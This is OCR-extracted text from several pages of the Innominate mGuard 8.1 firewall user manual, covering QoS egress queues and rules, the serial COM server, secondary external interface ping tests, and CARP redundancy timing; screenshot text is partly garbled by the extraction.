448. which priority the affected queue should be pro cessed provided the total available bandwidth has not been exhausted Comment Optional comment text 300 Innominate Security Technologies 105661_en_02 QoS menu 12 4 Egress Rules This page defines the rules for the data that is assigned to the defined egress queues see above in order for the data to be transmitted with the priority assigned to the relevant queue Rules can be defined separately for all interfaces and for VPN connections 12 4 1 Internal External External 2 Dial in Internal settings for egress queue rules QoS Egress Rules Internal External External 2 Dial in Default Default Queue Default Rules a eS CTT New TOSIDSCP f 1 a v 0 0 0 0 00000 fany 0 0 0 0 0 any TOS Minimize Delay w Unchanged v Urgent v p E 2 Al w 0 0 0 0 0 any 0 0 0 0 0 any TOS Maximize Reliability ow Unchanged v Important v S3 a v 00 0 00 any 0 0 0 0 0 any TOS Minimize Cost v Unchanged v Low Priority v External settings for egress queue rules QoS Egress Rules Internal External External 2 Dial in Default Rules mp PES Protocoi _ Fromie gr Current TOSIDSCP New TOSIDSCP FT E 1 All v 0 0 0 0 0 any 0 0 0 0 0 any Tos Minimize Delay v Unchanged v Urgent v Ft E 2 A v v 0 0 0 0 0 any 0 0 0 0 0 any TOS Maximize Reliability ow Unchanged v Important v FEH a v 000 00 any
449. width Rate Limit unlimited Queues 10 limited fO Urgent High v unlimited Medium w p 2 Important unlimited Medium w 3 Default Low v 4 Low Priority unlimited 105661_en_02 Innominate Security Technologies 297 m Guard 8 1 12 3 Egress Queues VPN 12 3 1 VPN via Internal VPN via External VPN via External 2 VPN via Dial in VPN via Internal settings for egress queues QoS Egress Queues VPN VPN via Internal Enabling Enable Egress QoS No vw Total Bandwidth Rate Bandwidth Rate Limit unlimited Queues 10 i p Urgent F important F Fi 4 10 10 10 unlimited unlimited unlimited unlimited VPN via External settings for egress queues QoS Egress Queues VPN VPN via Internal VPN via External Enabling Enable Egress QoS No wv Total Bandwidth Rate VPN via External 2 Bandwidth Rate Limit unlimited Queues 1 Urgent or important Default M low Pray VPN via External 2 settings for egress queues QoS Egress Queues VPN Enabling Enable Egress QoS No v Total Bandwidth Rate No High v Medium w Medium w Low v VPN via External 2 Bandwidth Rate Limit unlimited 10 PES ame O O Guarantee parti O Guaranteed 10 unlimited unlimited unlimited unlimited unlimited unlimited unlimited High v Medium v
450. with serial interface The mGuard platforms with a serial interface have an integrated COM server as of firmware 8 0 and later This enables serial interface data exchange via an IP connection Three options are available Additional settings for mGuard platforms with se rial interface RFC 2217 Telnet server complies with RFC 2217 In this mode the serial interface can be configured via client software in the network The Telnet server is available via the port which is defined under Local Port RAW client In this mode the mGuard initiates a connection to the address which is set under Re mote IP address The connection is established via the port which is configured under Remote Port The interface can be configured here Serial parameters The settings of the serial console are used for the baud rate and the hardware handshake see External Mo dem under Network gt gt Interfaces gt gt Modem Console RAW server Behaves in the same way as the RAW client However the RAW server responds to incoming connections via the port which is configured under Local Port External Modem Hardware handshake RTS CTS Off w Baudrate 57600 Handle modem transparently for dial in only bli Modem init string d dATH OK COM Server Type RAW server w Local port 3001 Serial parameters 1 stopbit no parity v Please note On some platforms the serial port is not accessible For
451. xternal interface please configure a route for them lf the operating mode of the secondary external interface is set to temporary the follow ing is checked using periodic ping tests can a specific destination or destinations be reached when data packets take the route based on all the routing settings specified for the mGuard apart from those specified for the secondary external interface Only if none of the ping tests are successful does the mGuard assume that it is currently not pos sible to reach the destination s via the primary external interface Ethernet interface or WAN port of the mGuard In this case the secondary external interface is activated which results in the data packets being routed via this interface according to the routing setting for the secondary external interface The secondary external interface remains activated until the mGuard detects in subse quent ping tests that the destination s can be reached again If this condition is met the data packets are routed via the primary external interface again and the secondary ex ternal interface is deactivated Therefore the purpose of the ongoing ping tests is to check whether specific destinations can be reached via the primary external interface When they cannot be reached the sec ondary external interface is activated until they can be reached again Type Destination Specify the ping Type of the ping request packet that the mGuard is to send to the dev
452. yer 2 The ICMP echo reply is the same size Table 16 2 shows the maximum frequency at which the presence notifications CARP are sent from the active mGuard It also shows the bandwidth used in the process The fre quency depends on the mGuard priority and the Fail over switching time Innominate Security Technologies 335 mGuard 8 1 Table 16 2 also shows the maximum latency tolerated by the mGuard for the network that is used to transmit the presence notifications CARP If this latency is exceeded the redun dant pair can exhibit undefined behavior Table 16 2 Frequency of the presence notifications CARP Fail over Presence notifications CARP per Maximum Bandwidth on switching second latency layer 2 for the time High priority Low priority high priority 50 per second 25 per second 37600 bps 16 6 per second 8 3 per second 12533 bps 336 Innominate Security Technologies 105661_en_02 105661_en_02 Redundancy 16 1 6 Error compensation through firewall redundancy Firewall redundancy is used to compensate for hardware failures Primary mGuard miel Internal Network 5 External Network 5 Secondary mGuard Figure 16 2 Possible error locations 1 8 Figure 16 2 shows a diagram containing various error locations not related to the network mode Each of the mGuard devices in a redundant pair is located in a different area A and B The mGuard in area A is connecte
Download Pdf Manuals
Related Search